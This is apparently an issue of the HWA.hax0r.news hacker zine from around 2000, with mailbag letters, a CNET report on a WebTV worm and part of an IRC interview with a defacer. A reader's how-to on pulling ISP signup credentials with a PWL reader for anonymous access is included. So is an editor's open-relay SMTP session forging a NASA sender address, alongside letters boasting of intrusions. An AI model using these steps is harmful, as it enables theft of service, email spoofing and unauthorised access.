ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD ** USE NO HOOKS ** Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. 
News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez Archive?), and does not condone 'warez' in any shape manner or form, unless they're good, fresh 0-day and on a fast site. cruciphux@dok.org Cruciphux [C*:.] HWA/DoK Since 1989 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you ~~~~~~~ are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. 
Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc

If you still can't think of anything you're probably not that interesting a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: cruciphux@dok.org
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:

Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions!

My Preferred chat method: IRC Efnet in #HWA.hax0r.news

@HWA

00.2 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

__ ___ ___ \ \ / / |__ ___ __ _ _ __ _____ ____|__ \ \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ / \ V V / | | | | (_) | (_| | | | __/\ V V / __/_| \_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net ..............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@gmx.net......: currently active/programming/IRC+
pyra......................: currently active/crypto queen

Foreign Correspondents/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
HWA members ......................: World Media
Armour (armour@halcon.com.au).....: Australia
Wyze1.............................: South Africa
Xistence..........................: German/Dutch translations

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2.
MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas 99 issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. New members/affiliates Xistence ..... General news and Dutch/German translations sP|a|Zm ..... Swedish news / translations SugarKing ..... General news articles * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs* Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ theduece ytcracker loophole BlkOps MostHated vetesgirl Slash bob- CHEVY* Debris pr1zm JimJones Dragos Ruiu pr0xy MR^CHAOS Eckis Fuqrag Messiah v00d00 meliksah dinkee omnihil sP|a|Zm OE KillNow iPulse erikR prizm paluka Xistence doobee phold hi ;) {} mixter merXor abattis Xistence #darknet #feed-the-goats #EUA #IBT the b0f crew etc fuck I /storm/ did you do it yet? ;-) i'll get your shit in here soon.. promise :) shouts to Xochitl13 for sending the cool postcard with a pic of the la 2600 meeting place. cheers dude! Folks from #hwa.hax0r,news and other leet secret channels, *grin* - mad props! ... ;-) And many others, sorry if i missed you or forgot you! mail me and i'll flail myself unforgivingly in front of my open bedroom window until I bleed, then maybe, add u to the list (please, don't ask for pics...) 
Also mad props to doobee and the CCC (Chaos Computer Club) in Germany for setting up a new listserv system to help distribute the zine. (Will be in action soon, I have admin work to do first and testruns..). :-))) Ken Williams/tattooman ex-of PacketStorm, SpaceRogue for running a kick ass news net Emmanuel Goldstein for pure staying power All the crackers, hackers and phreakers The sysadmins, NOC controllers, network engineers IRCops, security professionals, tiger team operatives military cyberwar grunts, feds and 'special computer unit' coppers trying to keep shit together in this anarchic chaos. AND Kevin Mitnick (free at last, stay free this time man...) Kevin was released from federal prison on January 21st 2000 for more information on his story visit http://www.freekevin.com/ Recently reported 'helping' out the feds with security advice! kewl sites: + http://hackdesk.dhs.org/ NEW -> NEWBIE help + MORE + http://www.hack.co.za **DOWN ** EfNet channel: #darknet + http://blacksun.box.sk. + http://packetstorm.securify.com/ + http://www.securityportal.com/ + http://www.securityfocus.com/ + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://www.pure-security.net/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ ____ _ | \ | | _____ _____| __ ) _ _| |_ ___ ___ | \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __| | |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \ |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/ |___/ "What is popular isn't always right, and what is right isn't always popular..." 
- FProphet '99

Since we provide only the links in this section, be prepared for 404's - Ed

+++ When was the last time you backed up your important data?

++ http://zcaofficedirectory.com/

Beware of "pay-per-call" Area Code 809 SCAM! Do not respond to e-mails, phone calls, or pages which inform you to call a Caribbean Islands Area Code " 809 " phone number. If you call from the United States, you will apparently be charged $25.00 per minute (without being warned beforehand). It's important to prevent becoming a victim of this SCAM. Check all area codes before returning a call.

Thanks to myself for providing the info from my wired news feed and others from whatever sources, Zym0t1c and also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*** NEW WEB BOARD! ***
========================================================================

The message board has been REVIVED with a new script and is doing quite well. Check it out http://discserver.snap.com/Indices/103991.html .

Don't be shy with your email, we do get mail, just not much of it directed to other readers/the general readership. I'd really like to see a 'readers mail' section. Send in questions on security, hacking IDS, general tech questions or observations etc, hell we've even printed poetry in the past when we thought it was good enough to share.. - Ed

=======================================================================

* An interesting usenet email with a cool telephony URL to check out: *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 25 Feb 2000 12:33:09 -0600
From: "Jennifer 'AstroJenn' Martino"
Subject: Re: HWA.hax0r.news Underground Security
Organization: Not today. Not yesterday. And probably not tomorrow.
To: Cruciphux
Reply To: jennmartino@my-deja.com

i have a few phone sounds that you might be interested in..
cycle tone sweeper, switch verification messages, unidentifiable messages, those recordings that say a bunch of numbers, spit out touch tones and hang up, test messages, etc. less interesting than the above, but i also have recordings of some odd error messages, loops, blue box tones, red box tones, touch tones, ccitt5, a call from a jail. when applicable, the filename is the actual phone number i called to receive the sound. unfortunately they are not in ram nor mp3 formats but.. you can find my collection at

hope that helps,
jenn

--
The Web Page You Have Reached http://twpyhr.usuck.com
Over 225 telephone sounds. Home to "The Unofficial Touch Tone Tunes FAQ"
"The Phoney Dance. A collection of telephone graphics.
Jenn's Joint http://jennsays.usuck.com My Ob-Personal Page.

-=-

Freebie net hack ... these things are everywhere now, if you can't get net access for free or dirt cheap you're paranoid or living under a rock :-) ... of course remember, you get what you pay for - Ed

From: M* H*
To:
Sent: Friday, March 24, 2000 9:58 AM
Subject: submission

I wrote this text just now, thought it might be useful (don't use my realname or something plz). Grtz, m-m

-------------------------------------------------------------------------------
************************************************************
* HOW TO GET FREE (READ: ANONYMOUS) INTERNET ACCESS *
* m-m *
************************************************************

YOU'LL NEED:

Windoze (I'm sorry!)
A PWL Reader (TIP: get the demo version of pwltool @ www.webdon.com)
One of them ISP CD's with the M$ Internet Connection Wizard

HOW DOES IT WORK:

For the ones that don't know what the internet connection wizard is, i'll explain quickly. Since ISP's are constantly dying to get new members, they (sometimes) give away free CD's with magazines and stuff. All ICW does is make a temporary connection to a server, get some HTML, run Internet Explorer in fullscreen and have you fill in some stupid forms which will be CGI'd to the administration so you'll get your internet account... and the bill. Filling in false info can be useful, but won't work long + it's illegal.

For the temporary connection to the server ICW just makes a new Dial-up connection. So what you need to do is just boot up one of them CD's, make that connection, alt+tab away and use the PWL Reader to get the temporary info for the account. Cancel your subscribing and throw away the CD. The connection gets deleted from your dialup's automatically to prevent such abuse.

Load up your normal internet connection and go to that ISP's website. Go for technical support and get the nearest PoP. (Read: telephone number to log in). Now make a new dialup connection with that number and the login name and password you just earned with the PWL reader. Voila. You're connected. (Note: these are usually guest/guest or stuff like that). Try reaching an external website (i.a. www.news.insource.nl). If you can't connect it probably means the ISP was smart and blocked all external traffic for the sign up account.

I've tried this on several ISP's and it worked most of the time. Some ISP's were smart enough to block such jokes but some weren't. Since free internet is a fact these days this is only useful to remain anonymous. (if you're hacking or something).

end of email

-=-

From: Dragos Ruiu
To: <*>
Sent: Thursday, March 23, 2000 10:53 PM
Subject: kyxspam: hnn hacked?

After fielding TV reporter questions on the subject... I tried to go see what HNN had to say about Max, and www.hackernews.com got me a page that said:

White House White House WhiteHouse White House WHite House

White House

... definitely not what I was looking for ....

--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver
Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org, RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com

-=-

Editor's note: this hack is unconfirmed and was not mentioned on HNN (curious) possibly a dns grab, unknown at this time ... I'd have expected HNN to acknowledge any hacks successful or not. Site whitehouse.com is a porn site... take that as you will.

-=-

From: Mr. Unknown
To:
Sent: Wednesday, March 22, 2000 7:18 PM

First I want to say the zine is kickass. SugarKing pointed me to the latest one. Read it last nite at work. That really sux that Fuqrag was raided. I work at a place where he did a defacement and maybe some other stuff. ;) Since then, I have been interested about what else he was doing. Only could catch the latest defacements, though. I get a good laugh at work when the servers go down and say "FUQRAG IS BACK!" They freak! haa haa so funny it really pisses them off. They won't listen to me about our network's security since I am only a pc tech. and they are big MSCE's. I thought MSCE's had to know their shit? They set up an ftp server and told everyone that it didn't allow anonymous log in, ha, should've seen their faces when some good pics showed up in their personal directories. After they still hadn't figured out who it was, I told them how to fix that problem. What do you know, the next day my admin rights were gone, and the test account another admin setup for me was gone. Even showed them problems with asp. It's just pissing them off and they are not doing anything about it. Not even patching old holes. Very discouraging for me, when I can show them how to fix their shit. You would think after being hacked they would do something. reading the interview with fuqrag was some kewl shit.
I hope they take it easy on em. I hope he writes some articles for the zine, too. Anyway I just wanted to let you know that the zine kicks ass and content is good. I wish to be as 313373 as fuqrag!! Keep up the great work mr.unknown ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com -=- The kind of mail we love getting ... :-) - Ed And some interesting SPAM ?!? Dear Web Master, Do you want to know how your computer skills rate? Take a FREE Brainbench certification exam ONLINE and find out how good your IT skills really are. Everyday, thousands of technical professionals take a FREE Brainbench certification exam online to rate their skills. They use the test results to get a better understanding of their strengths and weaknesses or to earn a certification that helps them get a better job. It only takes a moment to register online for an exam. You will then immediately receive your FREE test access code, which will allow you to take the multiple-choice exam anytime within the next 30 days. Register NOW at http://destinationsite.com/c?c=71838.2597.0.3128.0 If you pass the exam, Brainbench will certify your skill and mail you an attractive 81/2" x 11" certificate FREE! Plus you can make your certification available online if you choose. As the world's leading skills certification authority, Brainbench certifications are recognized by major employers and staffing organizations throughout the world. ============================================================ Register for any FREE exam NOW and automatically enter a monthly drawing for $500. http://destinationsite.com/c?c=71838.2597.0.3128.1 Take advantage of this great offer! Pass it along to your friends! Brainbench has 60 different exams to choose from! ============================================================ How does it work? 1) Register for an exam at http://destinationsite.com/c?c=71838.2597.0.3128.2 There are about 60 exams to choose from. 
You will receive instructions on how to complete the exam when you register. 2) When it is convenient for you, enter your test code at the Brainbench website. You will take the multiple-choice exam online. It will take about 45 minutes. You can take it ANYTIME from ANYPLACE using a common web browser. (version 3.0 or later preferred). 3) As soon as you finish the exam, you can view your test results including your skill rating (on a scale of 1.00 - 5.00) with a list of your strengths and weaknesses. To certify you need a score of 2.75 or higher. To certify as a Master, you need a score of 4.00 or higher. The test engine is computer-adaptive, meaning it will adjust to your skill level so whether you are a novice or an expert, it will ask questions that are close to your skill level. 4) All your information is held private unless you allow it to be released. Who recognizes Brainbench certifications? 1) Virtually all employers recognize Brainbench certifications- we are the leading independent certification authority with over 500,000 exams ordered last year! 2) Top technology companies and top staffing companies use Brainbench exams to screen their technical staffs, including: Ernst & Young, EDS, CSC, PriceWaterhouseCoopers, kforce.com, JP Morgan and many others. 3) Due to Brainbench's secure adaptive-testing method, employer's trust the Brainbench approach to validating a job candidate's skills. What does it mean to be certified? 1) It means you join the ranks of those professionals who can prove that they have the credentials to do a job. Employers will be more likely to put their trust in you. 2) You can pursue, with confidence, the jobs you want. 3) Whether you pass or not, every time you take the test you will receive a private report on your strengths and weaknesses as well your personal ranking in the industry. Is it really FREE? Yes. There is absolutely NO CHARGE to you. You can take the exam FREE. We'll mail your certificate, FREE. There are no hidden costs. 
We are doing this because we want to grow the number of people who receive the benefit of a Brainbench certification exam. We will eventually charge people to take the exam, but for now it is FREE. So enjoy, and please- pass this on to your friends.

Register now for your FREE exam: at http://destinationsite.com/c?c=71838.2597.0.3128.3

Mike Littman
Cofounder, Brainbench, The skills authority

-=-

From:
To:
Sent: Saturday, March 18, 2000 5:42 AM
Subject: Need a hand? ... I mean, Help?

Hello, there... I came across your HWA newsletter. I read you are looking for help. I have no clue about hacking and all the magic that you guys do. I can tell you it fascinates me, and I've been reading attrition for quite a while. I work with computers (as in: Dummy 101 . Can't expect much from blondes...*ugh*) I'm originally from Italy. So, if you ever came across something to translate from Italian to English I would be more than happy to help you out. I'd like to keep a very-very low profile. No profile at all would even be better. Just my 2 Cents. You're doing a wonderful job...

Ciao, ciao
Simona

-=-

Don't usually post these, but just to prove we do get offers of help so don't sit there get up and do something too! :-)) - Ed

-=-

Using cablemodem? especially on the @HOME network? expect weird shit the teething problems aren't over .. here's an interesting diatribe from Dragos on some recent @home-isms ... - Ed :

From: Dragos Ruiu
To: <*>
Sent: Monday, March 20, 2000 11:58 PM
Subject: kyxquestions: @home puke

Here are more puzzles for all you armchair hacker sleuths...

In the last two days my cablemodem has started spewing ICMP Host Unreachable packets from a local 10.11.* address to seemingly random addresses but each address is repeated multiple times. Most of the dest hosts are in 207.230.246.* We are talking about lots of packets here... every couple of min. This was preceded by the unusual occurrence of 10.11.* -> 10.11.* traffic. Which was followed by mapping and poking at random 10.11.* addresses from varied addresses. 10.11 is where @ home puts their cablemodems. As to why I would be seeing this stuff on the client side of my cablemodem that's a good question - especially those 10.11 -> 10.11 packets. I haven't ruled out some flaky modem or router yet blasting garbage into the ether, and @home has been having to "reboot their servers" a lot lately.

Other weird stuff is broadcasts from 10.11.* hosts on port 121 to subnet broadcast addresses.

Looking back into the logs shows that this kind of ICMP storm has happened in the past weeks on and off a couple of times. Interestingly, before today... the destination was always in the 172.16.*.* address space. Each time, the activity starts, is heavily active and then stops within minutes.... only today it seems to be going on and not abating and it seems to like destinations of 207.230.246.[170,253] (what looks like a name server {woop, woop, danger will robinson} and a test box at vsb.bc.ca and 24.112.31.56 and 172.16.6.195 (no reverse dns lookup avail) as its favorite destinations.

Today's activity seems to all come from one cablemodem and the activity in the past seemed to vary in source modem address. The single source says to me that it may just be one flaky modem. Now I gotta go and find where the whois registry for the ca domain hides.

Miscellaneous crud: 24.113.85.105 cr547339-a.surrey1.bc.wave.home.com which seems to be running some sort of port-1080-wingate sort of thing has been trying to log in to an ftp server here, when he oughtn't. And lots and lots of the typical wingate scans and along with oodles of the not so common yet Trin00/TrojanCow/DeepThroat 3.1 traffic/scans.

Anybody got a good rundown/synopsis of DeepThroat or Trojan Cow they can point me to? I have to go see what ArachNIDS says.

BTW for those that are keeping score Trojan Cow seems to be the winner in the number of hosts infected dept.
if the # of different sources of the broadcasts and volume are any indication.

Bottom line: Something is weird and new. We also had a runaway lynx process on one server.... now I hear there is a new remote overflow in it (Safer) - but that is just circumstantial evidence. That plus another potentially false outbound xterm trigger all leads to the old spidey senses saying... fee fi fo fum... I smell hacking.

P.p.s. for Max and the rules guys... outbound nmap TCP connect scans seem to false the "AOL chat data" rules in snort, not sure if that's in vision.conf or rapidnet set yet but I find this a useful falsing that lets me log outbound nmaps I initiate. :-)

--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - April 10-12 Vancouver
Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org, RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com

-=-

* From the Web board: *
~~~~~~~~~~~~~~~~~~~~~~~~

(Didn't pull any from the board, check it out, some interesting stuff on there... - Ed)

@HWA

02.0 From the editor.
~~~~~~~~~~~~~~~~

_____ _ _ _ _ | ____|__| (_) |_ ___ _ __( )__ | _| / _` | | __/ _ \| '__|/ __| | |__| (_| | | || (_) | | \__ \ ___|_____\__,_|_|\__\___/|_| |___/ / ___| ___ __ _ _ __ | |__ _____ __ \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ / ___) | (_) | (_| | |_) | |_) | (_) > < |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\ |_|

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /* Another monthly release... oh well read on.
     *
     *
     * Cruci
     *
     * cruciphux@dok.org
     * Preferred chat method: IRC Efnet in #HWA.hax0r.news
     *
     */

    printf ("EoF.\n");
    return 0;
}

Snailmail:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

Anonymous email:

telnet (wingate ip) (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT

If you got that far everything is probably ok, otherwise you might see

550 cruciphux@dok.org... Relaying denied

or

550 admin@nasa.gov... Domain must exist

etc.

* This won't work on a server with up to date rule sets denying relaying and your attempts will be logged so we don't suggest you actually use this method to reach us, it's probably also illegal (theft of service) so, don't do it. ;-)

-=-

Congrats, thanks, articles, news submissions and kudos to us at the main address: cruciphux@dok.org

complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe or ol' papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--=

03.0 Clearing up a nasty screw up in issue #51, here's what happened...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I fucked up. Two 'versions' of #51 were actually released, a few early birds got the "bad" copy. The 'real' copy has (2) in the upper left very top corner. Collectors edition! :-) Details? nah you wouldn't be interested anyways....

-=-

@HWA

04.0 HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NOTE: I had a gracious offer from *someone* the last time HACK.CO.ZA needed hosting but unfortunately my mailbox had corrupted and I lost this message before I could forward it to the site owner Gov-Boi, if after reading this you can still offer services, please send another email to me at cruciphux@dok.org... thanks! @HWA 05.0 WebTV hit by "Melissa-Type" virus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by: Merxenary Source: C|Net http://news.cnet.com/news/0-1006-200-1576095.html?tag=st.ne.1002. WebTV hit by Melissa-like bug By Stephanie Miles Staff Writer, CNET News.com March 17, 2000, 3:55 p.m. PT WebTV has been hit by a self-replicating bug that is wreaking havoc with the network's message boards and newsgroups, a situation that knocks back the company's claim that it is immune to viruses and security holes. The problem, which some are calling the "Flood Virus," gets inside the e-mail system of WebTV owners and prompts the WebTV settop box to litter bulletin board and newsgroup sites on the company's network with redundant junk mail. Like the Melissa virus, the malicious WebTV code sends out the emails under a user's name without their knowledge. Melissa-type viruses cause damage by clogging email servers of corporations and organizations with illegitimate emails. For WebTV users, the chief problem so far has come in trying to read the intra-network web sites. Bulletin boards on the WebTV network only show five postings at a time. An outbreak of the Flood Virus therefore makes it very difficult for users to find relevant messages on the board. Subscribers also face potential embarrassment, as emails under their name are posted to newsgroups without their knowledge. Microsoft, which owns WebTV, has confirmed the existence of the problem but claims the situation is a hack rather than a virus. The company added that the problem is not widespread. 
Whatever the root cause of the problem, the situation is a black eye for the service. One of WebTV's marketing pitches has been that subscribers do not have to worry about rogue viruses on the Internet.

Microsoft also has had a tempestuous relationship with segments of its subscriber base over technological issues in the past. After gaining attention as the first firm to offer Internet service through the television, WebTV has struggled to build its subscriber base and has encountered criticism from users for failing to support standard Web technologies such as Java. The company was acquired by Microsoft in 1997.

WebTV was recently forced to reverse course and remove banner ads from emails viewed and stored on the site in response to a flood of customer complaints. The backlash comes as WebTV faces a looming challenge from Internet service giant America Online, which is set to launch its AOL TV sometime this summer.

The problem was first discovered by Net4TV, which tracks interactive television. Net4TV came up with the Flood Virus name.

"It's absolutely self-replicating. It inserts the virus code into the signature upon opening the email or going to the newsgroup," said Brian Bock, editor in chief at Net4TV.

The general public does not have to worry about the flaw. It can only come in e-mails from WebTV units and it only affects other WebTV boxes. In addition, all of the excess mail is currently being directed at newsgroups and bulletin boards on the company's network.

The WebTV network is written mainly in HTML, and the company uses HTML shortcuts for certain network features, according to Net4TV. Shortcuts within users' email signature files, the calling card at the bottom of an e-mail message, serve as the entryway for the malicious code. The code manipulates the signature file and then prompts the WebTV unit to post repeatedly to WebTV newsgroups.

WebTV representatives could not confirm this account of how the network is set up. Nonetheless, they acknowledged it exists.

"It's a fundamental flaw in the WebTV architecture," Bock said.

Although WebTV currently counts about one million subscribers, Microsoft is marketing portions of the service along with its TV Pak to cable service providers as Microsoft TV. If portions of the WebTV browser are easily susceptible to these types of attacks, Bock said, it does not bode well for Microsoft TV if it is installed on a widespread basis through cable providers.

"It points to a larger problem," he said, calling for an independent security analysis of the WebTV architecture, similar to that which took place with Microsoft's Hotmail free email service after suffering repeated privacy breaches. "It points to what else may be going on under there."

For its part, WebTV says the problem has only hit a very small number of WebTV Classic users. According to Microsoft, hackers combined two known WebTV hacks: one which inserts malicious code into the user's email signature file, and one which inserts malicious code into postings on the newsgroup itself.

"These two codes were linked together," a spokesperson said, asserting that only 14 of the 594,000 WebTV Classic users have reported being infected with the bug. WebTV had previously created fixes for the two separate problems when they originally surfaced. The company is working on a more comprehensive patch to be released next week.

In the meantime, users should open their signature file to check if any new text or code has been inserted, the WebTV representative said.

@HWA

06.0 BlaznWeed interview, background info, and Sect0r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By Cruciphux

BlaznWeed contacted me regarding commenting on some of the things Sect0r said in the interview last issue, so we address those and get a general interview as well... mildly edited to remove general chatter.
- Ed

Interview date: Sun Mar 19/2000
By: Cruciphux

Session Start: Sun Mar 19 15:26:53 2000
[15:26] Session Ident: BlaznWeed (some1@*.*.*.uk)
[15:26] i'm ready
[15:27] ok hi.. sorry to keep ya waiting
[15:27] np
[15:27] i'm pretty informal, no real structure
[15:28] thats fine by me
[15:28] i'll do the preliminary intro questions ...
[15:28] like age interest group affiliations etc
[15:28] i'm 20 and my group is wkD
[15:29] whats wkD stand for?
[15:29] and how long has it been around?
[15:29] wicked
[15:29] how many members and where are they based?
[15:29] how did you meet? irc?
[15:29] :
[15:29] there are many members
[15:30] and i don't know them all
[15:30] some in other groups too?
[15:30] I got introduced to wkD by zeroc
[15:30] who is the founder
[15:30] I don't think so
[15:30] but i can't say for sure
[15:30] he hangs on dalnet mostly
[15:31] you too?
[15:31] yeah
[15:31] why dalnet? any reason?
[15:31] Most of my friends are on dalnet
[15:31] how long have you been on the net?
[15:32] about three four years
[15:32] to
[15:32] how long have you been into computers? same time or longer?
[15:32] the net is relatively new here in the uk
[15:32] longer
[15:32] about six maybe 7
[15:33] how would you classify yourself? ie: hacker cracker coder scriptkid
[15:33] and do you code? if so in what?
[15:33] hehe
[15:33] yes i do code
[15:34] but i haven't written my own exploits yet
[15:34] oh I forgot 'defacer'
[15:34] :)
[15:34] i'm a full time computer science student
[15:34] i suppose i'd be labeled a cracker
[15:34] so you break into sites but don't deface all of them?
[15:35] If i manage to break into a unix box i don't deface them
[15:35] about how many have you done?
[15:35] simply because i have other uses for them
[15:35] and how long have you been doing it?
[15:35] but the N boxes i have no use for
[15:35] nod
[15:36] maybe a couple of years now
[15:36] i started off hacking nothing but unix boxes
[15:36] what is your home machine?
[15:36] if more than one box whats your setup?
[15:36] I actually enjoy playing hide and seek with admins
[15:36] heh
[15:36] battle of wits
[15:37] I'm just running linux at home
[15:37] but i used to run solaris
[15:37] but the thing with solaris is that it doesn't run very well on x86 processors
[15:38] so i'm stuck with linux until i can afford a sparc
[15:38] I don't like solaris
[15:38] solaris and linux are like blondes and brunettes i like em both
[15:38] :D
[15:38] and its worse on x86 processors
[15:39] what about *BSD?
[15:39] its closer to real unix than linux*
[15:39] I haven't tried that
[15:39] though i do have a couple of bsd shells
[15:39] legit ones mind
[15:40] without giving details outline a typical hack, ie: what do you use as a base point, do you use pbx or redirectors to dial into hacked accts etc, what country do you use etc
[15:40] yeah i notice
[15:41] no comment
[15:41] hehe
[15:41] damn that was the most interesting too
[15:41] :)
[15:41] :)
[15:43] well i suppose this interview gives me the perfect opportunity to address some of the misleading comments written by sect0r in the last issue of hwa
[15:43] I was about to approach that
